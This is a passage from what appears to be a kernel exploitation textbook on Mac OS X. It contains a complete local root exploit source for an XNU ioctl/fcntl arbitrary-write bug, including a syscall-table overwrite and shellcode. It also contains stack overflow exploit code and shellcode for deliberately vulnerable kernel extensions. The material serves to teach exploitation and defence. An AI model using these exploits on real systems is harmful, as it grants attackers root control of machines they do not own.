To do this we need to populate the winsize structure in the kernel before we write it to our supplied address. We can use the TIOCSWINSZ IOCTL for this purpose. This is the exact reverse of TIOCGWINSZ; it simply takes a winsize structure as the third data argument and copies it into the winsize structure (t_winsize) in kernel memory. By first calling TIOCSWINSZ with our data and then calling TIOCGWINSZ via fcntl(), we can write any eight bytes (sizeof(struct winsize)) of our choice anywhere in kernel memory.

We can now begin to formulate our exploit code for this. First, we'll create two functions for reading and writing the winsize structure in the kernel. These are simple, and could easily be macros, but they will make our code cleaner.

int set_WINSZ(char *buff)

{

return ioctl(0, TIOCSWINSZ, buff);

}

int get_WINSZ(char *buff)

{

return ioctl(0, TIOCGWINSZ, buff);

}

These two functions are for our legitimate use of the TIOCGWINSZ IOCTL, but now we must create a function for accessing this using the fcntl() method to write to kernel memory. Since in some cases we may need to write more than eight bytes (the size of the winsize structure), we can design our function to repeatedly make the fcntl() call to write the full extent of the data. It will also utilize the set_WINSZ() function from earlier to update the data being written each time. Here is our completed function:

int do_write(u_long addr, char *data, u_long len)

{

u_long offset = 0;

if(len % 8) {

printf("[!] Error: data len not divisible by 8\n");

exit(1);

}

while(offset < len) {

set_WINSZ(&data[offset]);

fcntl(0, TIOCGWINSZ, addr);

offset += 8;

addr += 8;

}

return offset;

}

With the code we have written so far, we have gained the ability to write anything we want anywhere in kernel memory. Now, however, we need to work out what we can overwrite to gain control of execution. Ideally, we would like to overwrite either the per-process structure responsible for storing our user ID (proc struct) or a function pointer of some kind that we can call at will.

An obvious choice that meets our criteria is to overwrite an unused entry in one of the system call tables. As we described in this chapter's introduction, the XNU kernel has several system call tables set up in memory, and any of these would be a worthwhile target. Probably the most suitable system call table for our purposes is the BSD sysent array. This is because when a BSD system call is executed the first argument passed to it is always a pointer to the current proc struct. This makes it very easy for our shellcode to modify the process structure and give the calling process elevated privileges. We will, however, be required to identify the address of the table prior to using it. By default on Mac OS X, the kernel binary is available on disk as /mach_kernel. It is stored in an uncompressed format and is simply a Mach-O binary. This makes it trivial for an attacker to resolve most symbols by simply using the “nm” utility, which is installed by default on Mac OS X. Indeed, grepping through the mach_kernel symbols looks like the way to go:

-[luser@macosxbox]$ nm /mach_kernel | head -n5

0051d7b4 D .constructors_used

0051d7bc D .destructors_used

002a64f3 T _AARPwakeup

ff7f8000 A _APTD

feff7fc0 A _APTDpde

Unfortunately, there's a slight problem with this. Because many rootkits began to simply modify the system call table to hook system activity, Apple decided to no longer export the sysent symbol for use by kernel extensions. This means we cannot easily locate sysent with a simple grep. However, Landon Fuller [3] demonstrated a useful technique while he was developing a replacement for the crippled ptrace() functionality. Landon proposed that by isolating the address of the nsysent variable, which is stored in memory directly before the sysent array, and then adding 32 to this value, you can locate the sysent table. Utilizing his technique, we can develop the following function to resolve the address of the sysent table (and yes, use grep again):

u_long get_syscall_table()

{

FILE *fp = popen("nm /mach_kernel | grep nsysent", "r");

u_long addr = 0;

fscanf(fp,"%lx",&addr);

addr += 32;

printf("[+] Syscall table @ 0x%lx\n",addr);

return addr;

}

Using this function, we can retrieve the address of the beginning of the sysent array; however, we still need to seek into this array and write our function pointer to it. To do this we need to understand the format of each entry in this array, described via the sysent struct:

struct sysent {

int16_t sy_narg; /* number of arguments */

int8_t sy_resv; /* unused value */

int8_t sy_flags; /* call flags */

sy_call_t *sy_call; /* implementing function */

sy_munge_t *sy_arg_munge32;

sy_munge_t *sy_arg_munge64;

int32_t sy_return_type; /* return type */

uint16_t sy_arg_bytes;

} *_sysent;

This structure contains attributes describing the function responsible for handling the system call designated by the index into the table. The first element is the number of arguments the system call takes. The most important element to us is the sy_call function pointer that points to the location of the function responsible for handling the system call. Next, we must look at the sysent table definition and find an unused slot in the table. We can accomplish this by simply reading the /usr/include/sys/syscall.h header file and finding a gap in the numbers that are allocated.

#define SYS_obreak 17

#define SYS_ogetfsstat 18

#define SYS_getfsstat 18

/* 19 old lseek */

#define SYS_getpid 20

/* 21 old mount */

/* 22 old umount */

#define SYS_setuid 23

#define SYS_getuid 24

The syscall index value 21 is unused, so this will suit our needs sufficiently. With this in mind we can structure our fake sysent entry as follows:

struct sysent fsysent;

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *) 0xdeadbeef;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

This entry will result in execution being redirected to the unmapped address 0xdeadbeef. To make this happen we need to use our do_write() function to write this structure to the appropriate place in kernel memory. Our code first resolves the address of the sysent table using our get_syscall_table() function. After this, the LEOPARD_HIT_ADDY macro is used to calculate the offset into the table for the particular syscall number of our choice. This macro was taken from an HFS exploit written by mu-b and simply multiplies the size of a sysent entry by the syscall number and adds it to the address of the base of the sysent table.

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

printf("[+] Retrieving address of syscall table…\n");

sc_addr = get_syscall_table();

printf("[+] Overwriting syscall entry.\n");

do_write(LEOPARD_HIT_ADDY(sc_addr),(char *)&fsysent,sizeof(fsysent));

Now that our code can overwrite the sysent entry for our unused system call, all that's left is to call it and see what happens. The following code will do this:

syscall (SYSCALL_NUM, NULL);

If we compile the code we've written so far and execute it with a debugger attached, we'll see the following message:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

Jackpot! Once again, this indicates that we've controlled execution and redirected it to 0xdeadbeef. This means we can execute code at any location of our choice; however, we will need to execute some meaningful shellcode for this to be of any use to us.

Note

It's interesting to note that although Apple stopped exporting the sysent table due to rootkit use, it never stopped exporting the symbols for the other system call tables available in the kernel. This means tables such as mach_trap_table are still easy to access from a kernel extension.

Since we are able to write anything we want to kernel memory, we can easily pick a location and write our shellcode to it. The write-up of this vulnerability by Razvan that we mentioned earlier showed a location in kernel memory that can be overwritten with very few consequences. This is known as iso_font. This seems like a perfect location for our shellcode. We can use the following function to resolve the address of this location, in exactly the same way the nsysent symbol was retrieved:

u_long get_iso_font()

{

FILE *fp = popen("nm /mach_kernel | grep iso_font", "r");

u_long addr = 0;

fscanf(fp,"%lx",&addr);

printf("[+] iso_font is @ 0x%lx\n",addr);

return addr;

}

The final step in the exploitation process is to create some shellcode to elevate the privileges of our current process. We can use the generic shellcode approach we described earlier, in the section “The Execution Step,” but it's worth remembering once again that writing shellcode for kernel exploitation can be situational. Although it is possible to write generic kernel shellcode, often you need to take precautions to make sure your exit from the kernel is clean, by repairing corrupt memory structures, for example. To complete this exploit, we simply need to use the first argument on the stack to access the proc struct for our calling process. To do this we must perform a typical function prolog, setting up the base pointer and storing the old one on the stack. We can then access the proc struct via EBP+8.

push ebp

mov ebp,esp

mov eax,[ebp+0x8]

After we have retrieved the proc struct address we can use the instructions we documented in “The Execution Step” to elevate our privileges. When we're finished writing to our ucred struct we can simply use the LEAVE instruction to reverse the process, then use the RET instruction to return to the system call dispatch code, which in turn will return us to user space with no negative consequences. Putting this all together leaves us with the following shellcode:

push ebp

mov ebp,esp

mov eax,[ebp+0x8] ; get proc *

mov eax,[eax+0x64] ; get p_ucred *

mov dword [eax+0xc], 0x00000000 ; write 0x0 to uid

mov dword [eax+0x10],0x00000000 ; write 0x0 to euid

xor eax,eax

leave

ret ; return 0

All that's left now is to write our shellcode into the location of iso_font that we retrieved earlier. Once again, we can use our do_write() function to accomplish this:

printf("[+] Writing shellcode to iso_font.\n");

do_write(shell_addr,(char *)shellcode,sizeof(shellcode));

For the sake of completeness, we have included the full source code for a sample exploit for this vulnerability. This exploit combines everything we've discussed so far to leverage a root shell. After the ucred struct has been modified, it's simply a case of execve()'ing /bin/sh to collect our root shell.

/* -------------------

* -[ nmo-WINSZ.c ]-

* by nemo - 2009

-------------------

*

* Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story-of-a-simple-and-dangerous-kernel-bug

* Stole shellcode from mu-b's hfs exploit, overwrote the same syscall entry (21).

*

* Tested on Leopard: root:xnu-1228.12.14~1/RELEASE_I386 i386

*

* Enjoy…

*

* - nemo

*/

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/mman.h>

#include <unistd.h>

#include <sys/param.h>

#include <sys/sysctl.h>

#include <sys/signal.h>

#include <sys/utsname.h>

#include <sys/stat.h>

#include <sys/ioctl.h>

#include <errno.h>

#include <fcntl.h>

#include <string.h>

#include <sys/syscall.h>

#include <unistd.h>

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

struct sysent {

short sy_narg;

char sy_resv;

char sy_flags;

void *sy_call;

void *sy_arg_munge32;

void *sy_arg_munge64;

int sy_return_type;

short sy_arg_bytes;

};

static unsigned char shellcode[] =

"\x55"

"\x89\xe5"

"\x8b\x45\x08"

"\x8b\x40\x64"

"\xc7\x40\x10\x00\x00\x00\x00"

"\x31\xc0"

"\xc9"

"\xc3\x90\x90\x90";

u_long get_syscall_table()

{

FILE *fp = popen("nm /mach_kernel | grep nsysent", "r");

u_long addr = 0;

fscanf(fp,"%lx",&addr);

addr += 32;

printf("[+] Syscall table @ 0x%lx\n",addr);

return addr;

}

u_long get_iso_font()

{

FILE *fp = popen("nm /mach_kernel | grep iso_font", "r");

u_long addr = 0;

fscanf(fp,"%lx",&addr);

printf("[+] iso_font is @ 0x%lx\n",addr);

return addr;

}

void banner()

{

printf("[+] Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story-of-a-simple-and-dangerous-kernel-bug\n");

printf("[+] by nemo, 2009….\n");

printf("[+] Enjoy!;)\n");

}

int set_WINSZ(char *buff)

{

return ioctl(0, TIOCSWINSZ, buff);

}

int get_WINSZ(char *buff)

{

return ioctl(0, TIOCGWINSZ, buff);

}

int do_write(u_long addr, char *data, u_long len)

{

u_long offset = 0;

if(len % 8) {

printf("[!] Error: data len not divisible by 8\n");

exit(1);

}

while(offset < len) {

set_WINSZ(&data[offset]);

fcntl(0, TIOCGWINSZ, addr);

offset += 8;

addr += 8;

}

return offset;

}

int main(int ac, char **av)

{

char oldwinsz[8],newwinsz[8];

struct sysent fsysent;

u_long shell_addr, sc_addr;

char *args[] = {"/bin/sh",NULL};

char *env[] = {"TERM=xterm",NULL};

banner();

printf("[+] Backing up old win sizes.\n");

get_WINSZ(oldwinsz);

printf("[+] Retrieving address of syscall table…\n");

sc_addr = get_syscall_table();

printf("[+] Retrieving address of iso_font…\n");

shell_addr = get_iso_font();

printf("[+] Writing shellcode to iso_font.\n");

do_write(shell_addr,(char *)shellcode,sizeof(shellcode));

printf("[+] Setting up fake syscall entry.\n");

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *) shell_addr;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

printf("[+] Overwriting syscall entry.\n");

do_write(LEOPARD_HIT_ADDY(sc_addr),(char *)&fsysent,sizeof(fsysent));

printf ("[+] Executing syscall..\n");

syscall (SYSCALL_NUM, NULL);

printf("[+] Restoring old sizes\n");

set_WINSZ(oldwinsz);

printf("[+] We are now uid=%i.\n", getuid());

printf("[+] Dropping a shell.\n");

execve(*args,args,env);

return 0;

}

Here is the output from executing this exploit. As you can see, it leaves us with a bash prompt with root privileges.

-[luser@macosxbox]$ ./nmo-WINSZ

[+] Exploit for: http://butnotyet.tumblr.com/post/175132533/the-story-of-a-simple-and-dangerous-kernel-bug

[+] by nemo, 2009….

[+] Enjoy!;)

[+] Backing up old win sizes.

[+] Retrieving address of syscall table…

[+] Syscall table @ 0x50fa00

[+] Retrieving address of iso_font…

[+] iso_font is @ 0x4face0

[+] Writing shellcode to iso_font.

[+] Setting up fake syscall entry.

[+] Overwriting syscall entry.

[+] Executing syscall..

$ id

uid=0(root) gid=0(wheel) groups=0(wheel)

Stack-Based Buffer Overflows

As we described in Chapter 2, a stack-based buffer overflow occurs when you write outside the boundaries of a buffer of memory allocated on the process's stack. When we are able to write controlled data outside a buffer on the stack, we can typically overwrite the stored return address, resulting in arbitrary control of execution when the return address is pulled from the stack and used. (On the Intel x86 architecture, this is typically done by a RET instruction.)

To demonstrate techniques for exploiting this situation on a Mac OS X system we have contrived the following example:

#include <sys/types.h>

#include <sys/systm.h>

#include <sys/uio.h>

#include <sys/conf.h>

#include <miscfs/devfs/devfs.h>

#include <mach/mach_types.h>

extern int seltrue(dev_t, int, struct proc *);

static int StackOverflowIOCTL(dev_t, u_long, caddr_t, int, struct proc *);

#define DEVICENAME "stackoverflow"

typedef struct bigstring {

char string1[1024];

} bigstring;

#define COPYSTRING _IOWR('d',0,bigstring)

static struct cdevsw SO_cdevsw = {

(d_open_t *)&nulldev, // open_close_fcn_t *d_open;

(d_close_t *)&nulldev, // open_close_fcn_t *d_close;

(d_read_t *)&nulldev, // read_write_fcn_t *d_read;

(d_write_t *)&nulldev, // read_write_fcn_t *d_write;

StackOverflowIOCTL, // ioctl_fcn_t *d_ioctl;

(d_stop_t *)&nulldev, // stop_fcn_t *d_stop;

(d_reset_t *)&nulldev, // reset_fcn_t *d_reset;

0, // struct tty **d_ttys;

(select_fcn_t *)seltrue, // select_fcn_t *d_select;

eno_mmap, // mmap_fcn_t *d_mmap;

eno_strat, // strategy_fcn_t *d_strategy;

eno_getc, // getc_fcn_t *d_getc;

eno_putc, // putc_fcn_t *d_putc;

D_TTY, // int d_type;

};

static int StackOverflowIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

char string1[1024];

printf("[+] Entering StackOverflowIOCTL\n");

printf("[+] cmd is 0x%x\n",cmd);

printf("[+] Data is @ 0x%x\n",data);

printf("[+] Copying in string to string1\n");

sprintf(string1,"Copied in to string1: %s\n",data);

printf("finale: %s", string1);

return 0;

}

void *devnode = NULL;

int devindex = -1;

kern_return_t StackOverflow_start (kmod_info_t * ki, void * d)

{

devindex = cdevsw_add(-1, &SO_cdevsw);

if (devindex == -1) {

printf("cdevsw_add() failed\n");

return KERN_FAILURE;

}

devnode = devfs_make_node(makedev(devindex, 0),

DEVFS_CHAR,

UID_ROOT,

GID_WHEEL,

0777,

DEVICENAME);

if (devnode == NULL) {

printf("devfs_make_node() failed\n");

return KERN_FAILURE;

}

return KERN_SUCCESS;

}

kern_return_t StackOverflow_stop (kmod_info_t * ki, void * d)

{

if (devnode != NULL) {

devfs_remove(devnode);

}

if (devindex != -1) {

cdevsw_remove(devindex, &SO_cdevsw);

}

return KERN_SUCCESS;

}

This is the code for a kernel extension that registers a device with the (extremely original) name “/dev/stackoverflow”. It then registers an IOCTL handler for the device. The handler reads a string from the third argument, data, and copies it into a buffer on the stack using the sprintf() function. The sprintf() function is dangerous because it has no way to know the size of the destination buffer. It simply copies byte for byte until a NULL byte (\x00) is reached. Due to this behavior, we can cause this kernel extension to write outside the bounds of the string1 buffer and overwrite the stored return address on the stack to control execution. The first thing we need to check before we attempt to exploit this is the file permissions on our device file:

-[root@macosxbox]$ ls -lsa /dev/stackoverflow

0 crwxrwxrwx 1 root wheel 19, 0 Nov 27 22:43 /dev/stackoverflow

Good news—this file is readable/writable and executable by everyone. We could also have verified this by looking at the code responsible for setting up this device file: the value 0777 was passed in for file permissions.

The next step we can take is to create a program to trigger the overflow. To do this, we need to call the ioctl() function passing in our long string as the third data parameter. The following code demonstrates this:

#define BUFFSIZE 1024

typedef struct bigstring {

char string1[BUFFSIZE];

} bigstring;

int main(int argc, char **argv)

{

int fd;

unsigned long *ptr;

bigstring bs;

if((fd = open ("/dev/stackoverflow", O_RDONLY)) == -1 ) {

printf("error: couldn't open /dev/stackoverflow\n");

exit(1);

}

memset(bs.string1,'A',BUFFSIZE-1);

bs.string1[BUFFSIZE-1] = 0;

printf("data is: %s\n",bs.string1);

ioctl(fd, COPYSTRING,&bs);

}

If we compile and execute this code with a debugger attached, we can see that the saved return address has been overwritten and then loaded into EIP. EIP's value, 0x41414141, is the hexadecimal ASCII representation of “AAAA”.

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0x41414141 in ?? ()

Now that we know how to trigger the vulnerability, we must work out how to control execution in such a way that we can gain root privileges on the system and leave it in a stable state so that we can enjoy them for good. We begin by calculating the offset into our attack string that is responsible for overwriting the return address on the stack. This will allow us to specify arbitrary values for it. We accomplish this by first dumping an assembly listing for our IOCTL:

Dump of assembler code for function StackOverflowIOCTL:

0x00000000 <StackOverflowIOCTL+0>: push ebp

0x00000001 <StackOverflowIOCTL+1>: mov ebp,esp

0x00000003 <StackOverflowIOCTL+3>: push ebx

0x00000004 <StackOverflowIOCTL+4>: sub esp,0x414

0x0000000a <StackOverflowIOCTL+10>: mov ebx,DWORD PTR [ebp+0x10]

0x0000000d <StackOverflowIOCTL+13>: mov DWORD PTR [esp],0x154

0x00000014 <StackOverflowIOCTL+20>: call 0x0 <StackOverflowIOCTL> // printf

[…]

0x00000048 <StackOverflowIOCTL+72>: mov DWORD PTR [esp+0x8],ebx

0x0000004c <StackOverflowIOCTL+76>: lea ebx,[ebp-0x408]

0x00000052 <StackOverflowIOCTL+82>: mov DWORD PTR [esp],ebx

0x00000055 <StackOverflowIOCTL+85>: mov DWORD PTR [esp+0x4],0x1c8

0x0000005d <StackOverflowIOCTL+93>: call 0x0 <StackOverflowIOCTL> // sprintf

0x00000062 <StackOverflowIOCTL+98>: mov DWORD PTR [esp+0x4],ebx

0x00000066 <StackOverflowIOCTL+102>: mov DWORD PTR [esp],0x1e4

0x0000006d <StackOverflowIOCTL+109>: call 0x0 <StackOverflowIOCTL> // printf

0x00000072 <StackOverflowIOCTL+114>: add esp,0x414

0x00000078 <StackOverflowIOCTL+120>: xor eax,eax

0x0000007a <StackOverflowIOCTL+122>: pop ebx

0x0000007b <StackOverflowIOCTL+123>: leave

0x0000007c <StackOverflowIOCTL+124>: ret

Each function call in the listing is pointing to location 0x0. This is because the kernel extension will be relocated in the kernel, and the call instructions are patched in at runtime. Regardless, we know from the source that the second-to-last call instruction is our sprintf() (we added comments to make that clearer). By analyzing the arguments being pushed to the stack, we can see that our destination buffer is accessed at the location EBP-0x408 (at 0x0000004c).

0x0000004c <StackOverflowIOCTL+76>: lea ebx,[ebp-0x408]

0x00000052 <StackOverflowIOCTL+82>: mov DWORD PTR [esp],ebx

This means that after writing 0x408 (1,032) bytes, we will reach the stored frame pointer (EBP) on the stack; then, after another four bytes, we will reach the stored return address. Therefore, we can calculate the offset as follows:

memset(bs.string1,'\x90',BUFFSIZE-1);

bs.string1[BUFFSIZE-1] = 0;

unsigned int offset = 0x408 - strlen("Copied in to string1: ") + 4;

ptr = (unsigned long *)(bs.string1 + offset);

*ptr = 0xdeadbeef;

If we compile and execute this code, this time in our debugger, we can see that we overwrote the return address with 0xdeadbeef, as expected:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

The next step in our exploitation process is to position the shellcode somewhere in the kernel's address space and calculate its address. To achieve this we'll use a variant of the proc command-line technique that was presented in the “Kernel Exploitation Notes” article in PHRACK 64 while targeting the UltraSPARC/Solaris scenario. Here we'll use the p_comm element of the process structure to store our shellcode, and then calculate its address before exploitation.

struct proc {

LIST_ENTRY(proc) p_list;

/* List of all processes. */

pid_t p_pid;

/* Process identifier. (static)*/

char p_comm[MAXCOMLEN+1];

char p_name[(2*MAXCOMLEN)+1]; /* PL */

}

The p_comm element of the proc struct contains the first 16 bytes of the filename of the binary being executed. To utilize this for our exploit, we can use the link() function to create a hard link to our exploit with any name we choose, and then reexecute it. We can implement this with the following code:

char *args[] = {shellcode,"--own-the-kernel",NULL};

char *env[] = {"TERM=xterm",NULL};

printf("[+] creating link.\n");

if(link(av[0], shellcode) == -1)

{

printf("[!] failed to create link.\n");

exit(1);

}

execve(*args,args,env);

We passed the --own-the-kernel flag to our program the second time to signal to our process that it's being run with shellcode in p_comm so that it can begin stage 2 of the exploitation process.

Now that we know where to store our shellcode, we need to work out how to calculate its address before we trigger our buffer overflow. Again, the task is not much different from the UltraSPARC/Solaris case. The KERN_PROC sysctl will allow us to leak the address of the proc struct for our process. The following function will utilize this sysctl to retrieve the address of the proc struct for a given process ID:

long get_addr(pid_t pid) {

size_t sz = sizeof(struct kinfo_proc); /* sysctl() expects a size_t * */

int i, mib[4];

struct kinfo_proc p;

mib[0] = CTL_KERN;

mib[1] = KERN_PROC;

mib[2] = KERN_PROC_PID;

mib[3] = pid;

i = sysctl(mib, 4, &p, &sz, NULL, 0);

if (i == -1) {

perror("sysctl()");

exit(1);

}

return (long)p.kp_eproc.e_paddr;

}

To locate the address of p_comm from here, we simply need once again to calculate the proper offset, in this case 0x1A0, to add to the proc struct address. This leaves us with the following code:

void *proc = get_addr(getpid());

void *ret = proc + 0x1a0;

Since p_comm allows us only 16 bytes of storage space for our shellcode, we either need to chain multiple pieces of shellcode together, executing multiple processes, or write some really compact shellcode to accomplish what we need. For this example, we will use some compact shellcode to elevate our privileges to root, since, as it turns out, 16 bytes is more than enough room to do what we need.

Because we know at the time of execution that the ESP register will be pointing to the end of our attack string, we can pass in the address of the proc struct. This way, our shellcode will not have to locate the proc struct itself, shaving off several bytes of code. Therefore, we can start our shellcode by simply popping the address of the proc struct from the stack:

pop ebx // get address of proc

From here, we need to once again use a static offset and seek 0x64 bytes into the proc struct to retrieve the address of the ucred structure (p_ucred), then offset this by 16 and write 0 into it to gain root privileges. We set EAX to 0 and use it as the source of the write, because storing a register takes fewer bytes than storing an immediate 0.

xor eax,eax // zero out eax

mov ebx,[ebx+0x64] // get u_cred

mov [ebx+0x10],eax // uid=0

Now that we have upgraded our UID to gain root privileges, we are nearly done. However, we cannot just return neatly to our previous stack frame, as we have corrupted the stack. If we tried to issue the RET instruction it would simply pop an address from the stack and use it, most likely resulting in a kernel panic. To finish our shellcode we need to return to an address that will result in us exiting kernel space cleanly so that we can actually use our root privileges to some effect. One suitable way to accomplish this is to return to thread_exception_return(), a function located in the kernel .text segment. This function is called at the end of unix_syscall() and is responsible for transferring execution back to user space as though returning from an exception. It suits our needs perfectly. However, as with all of the functions in the kernel .text segment, its address has a NULL byte as its most significant byte.

-[luser@macosxbox]$ nm /mach_kernel | grep thread_exception_return

001a14d0 T _thread_exception_return

This will cause a problem for us, because when the sprintf() function reaches the \x00 byte of the address, it will terminate the copy. That's a bummer. Fortunately, working around this issue is not too complicated. We can encode the address of our function and decode it in our shellcode. To begin this process we must first write a function to retrieve the address of the thread_exception_return() function from the mach_kernel binary. Once again, we can do this by using the nm command:

u_long get_exit_kernel()

{

FILE *fp = popen("nm /mach_kernel | grep thread_exception_return", "r");

u_long addr = 0;

fscanf(fp,"%lx",&addr);

printf("[+] thread_exception_return is @ 0x%lx\n",addr);

return addr;

}

Now we must encode the address to remove the NULL byte. We can do this by shifting the address to the left by eight bits. This moves the whole address one byte to the left, leaving a NULL byte on the right-hand side instead of the left. We can then OR the result with 0xff to fill in the NULL byte on the end.

unsigned long exit_kernel = get_exit_kernel();

exit_kernel <<= 8; /* the 32-bit shift discards the leading NULL byte */

exit_kernel |= 0xff; /* fill the new low byte so no NULL byte remains */

In our quest for optimization, rather than passing this value to our shellcode on the stack (and requiring us to pop it off before use), we can take advantage of the fact that we are clobbering EBP, which is restored from the stack we've overwritten, and pass this value as the new EBP. This way, in our shellcode, we simply need to shift the EBP register to the right by eight to decode it, and then jump to it to exit the kernel.

shr ebp,8 // drop the 0xff filler and restore the null byte in our address.

jmp ebp // call our kernel exit function.

Putting all of this together gives us the following shellcode:

char shellcode[] = "\x5b\x31\xc0\x8B\x5B\x64\x89\x43\x10\xc1\xed\x08\xff\xe5";

This code is 14 bytes in length, which easily meets our 16-byte limitation.

Finally, our code needs to set up the attack string with the address of our proc struct and kernel exit function. Here is the complete code to do this:

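unsigned int offset = 0x408 - strlen("Copied in to string1: ");

ptr = (unsigned long *)(bs.string1 + offset);

*ptr = (unsigned long)exit_kernel; /* becomes the new EBP (encoded exit address) */

*(++ptr) = (unsigned long)ret; /* return address: shellcode in p_comm */

*(++ptr) = (unsigned long)proc; /* popped by "pop ebx" in the shellcode */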

After our ioctl() is called, our exploit can execve() /bin/sh to grant a shell with root privileges. If we compile and execute our completed exploit, we receive the following output:

-[luser@macosxbox]$ ./so

[+] creating link.

[+] thread_exception_return is @ 0x1a14d0

[+] exit_kernel tmp: 0x1a14d0ff

[+] pid: 293

[+] proc @ 0x329c7e0

[+] p_comm @ 0x329c980

uid: 0 euid: 501

sh-3.2# id

uid=0(root) gid=0(wheel)

Great! Once again, we are granted a very usable root shell. The full code listing for this exploit and for the vulnerable kernel extension is available at www.attackingthecore.com.

If our stack smash hadn't relied on the sprintf() function, and instead utilized a memory copy function that wasn't string-based (such as memcpy()), we could have gone about the exploitation in a different fashion. Since the NULL byte issue with the kernel .text addresses wouldn't have been a problem, we could have returned execution directly to kernel functionality to gain root privileges. To make this clearer, instead of using sprintf() we can change our example kernel extension to read a pointer and length as its argument, and copyin() that amount into a fixed stack buffer.

Our new kext interprets data as the following structure:

typedef struct datastruct {

void *data;

unsigned long size;

} datastruct;

And it uses it as shown in the following code:

static int StackSmashNoNullIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

char buffer[1024];

datastruct *ds = (datastruct *)data;

memset(buffer,'\x00',1024);

if(sizeof(data) > 1024){

printf("error: data too big for buffer.\n");

return KERN_FAILURE;

}

if(copyin((void *)ds->data, (void *)buffer, ds->size) == -1){

printf("error: copyin failed.\n");

return KERN_FAILURE;

}

printf("Success!\n");

return KERN_SUCCESS;

}

It casts data as a datastruct and then checks if sizeof(data) > 1024. Although this is a contrived example, this is a rather common mistake. data is a pointer in this example, and therefore sizeof(data) returns the size of a pointer on the target architecture. In this case, it returns 4, and the check is always false. Finally, the code uses the copyin() function to copy an arbitrarily supplied length of data into a buffer on the stack. As we mentioned earlier, this copy will not be terminated by encountering a NULL byte, so we are free to return to the kernel .text as much as we want.

Note

Interestingly, in this case auditing the binary would be much clearer than auditing the source code, as GCC will automatically optimize away the sizeof(ptr) > 1024 check. By reading the disassembly of the binary, we would find no check at all.

Again, our first step in developing an exploit for this issue is to dump an assembly listing for our kext and find a reference to our destination buffer:

0x0000000e <StackSmashNoNullIOCTL+14>: lea -0x408(%ebp),%ebx // dst

0x00000014 <StackSmashNoNullIOCTL+20>: movl $0x400,0x8(%esp) //length

0x0000001c <StackSmashNoNullIOCTL+28>: movl $0x0,0x4(%esp) // '\x00'

0x00000024 <StackSmashNoNullIOCTL+36>: mov %ebx,(%esp) // dst

0x00000027 <StackSmashNoNullIOCTL+39>: call 0x0 <StackSmashNoNullIOCTL> // memset()

Since we know the first function call, memset(), uses our buffer as its destination argument, it makes sense to look at this. We can clearly see that our buffer begins 0x408 bytes below the stored frame pointer on the stack. The stored return address sits four bytes above the frame pointer, that is, 0x40c bytes from the start of the buffer. Therefore, we can define the following:

#define OFFSET 0x40c

#define BUFFSIZE (OFFSET + sizeof(long))

Next, we can throw together a quick proof of concept to trigger the vulnerability. This code looks pretty similar to our previous example. The attack string is created with 0xdeadbeef positioned so as to overwrite the stored return address on the stack.

datastruct ds;

unsigned char attackstring[BUFFSIZE];

unsigned long *ptr;

memset(attackstring,'\x90',BUFFSIZE);

ds.data = attackstring;

ds.size = BUFFSIZE;

ptr = (unsigned long *)&attackstring[OFFSET];

*ptr = 0xdeadbeef;

ioctl(fd, DATASTRUCT,&ds);

If we compile and execute our code, we can see that EIP is replaced with 0xdeadbeef and we have arbitrary control of execution flow. Now that we control execution, we need to work out once again where we want to return to in order to gain root privileges. As we mentioned at the beginning of this section, since NULL bytes are not an issue in this case, we can freely return to the kernel .text segment. Therefore, we start looking for a way to execute something under our control. The search leads us to the KUNCExecute() function.

The kernel uses this function to communicate over a Mach port (com.apple.system.Kernel[UNC]Notifications) with a daemon (/usr/libexec/kuncd) running in user space, and tells it to execute an application. The KUNCExecute() function takes three arguments:

  1. executionPath: A string containing the path to the application you want to be executed. The third parameter dictates the format of this argument.

  2. openAsUser: Describes which user account the process will be executed as. The choices are kOpenAppAsConsoleUser or kOpenAppAsRoot. For our purposes, we typically want to go with kOpenAppAsRoot.

  3. pathExecutionType: Changes how kuncd will execute the application and can be one of three choices:

    1. kOpenApplicationPath, which means we must specify a full path to the application

    2. kOpenPreferencesPanel, which means we want to open a preferences panel and display it to the user

    3. kOpenApplication, which causes kuncd to use /usr/bin/open to start the application, and doesn't require the full path

The first thing that springs to mind after reading this description is that we can use p_comm in the proc struct to hold the path to the application, and then simply return to KUNCExecute() passing the address of p_comm as the first argument.

That's a good idea. Unfortunately, it turns out that we cannot use p_comm to store anything containing the character “/”. This means we cannot store a full path this way. An obvious solution to this is to use the kOpenApplication flag for argument 3. This flag indicates that the string in argument 1 contains the name of an application to open with /usr/bin/open, and this can be in a multitude of user-controlled paths.

Again, that's a good idea. Unfortunately, although this technique will result in an application being executed, whenever open is used to start an application its uid/euid defaults to that of the currently logged in console user, even if the open application itself is initially invoked as the root user. This essentially means we will need to find a new place to store our string, and we will need to find a reliable way to store it there. It looks like we need to keep our thinking hat on a little longer.

What do we have? We have a way to jump everywhere in the kernel .text segment. What do we need? We need to store an arbitrary string somewhere. Does the kernel need to do that in its normal, routine execution? Indeed it does—for example, each time it needs to bring in parameters from user land. How does it accomplish this? In a word: copyin(). So, how about returning, prior to calling KUNCExecute(), into the copyin() function? This way, we can copy our string into a fixed location in the kernel from user space.

That sounds good, but we must decide where to write our string. This solution is easy and we already know it. We can use the memory location of iso_font[] that we used in the arbitrary kernel memory write scenario to store our string.

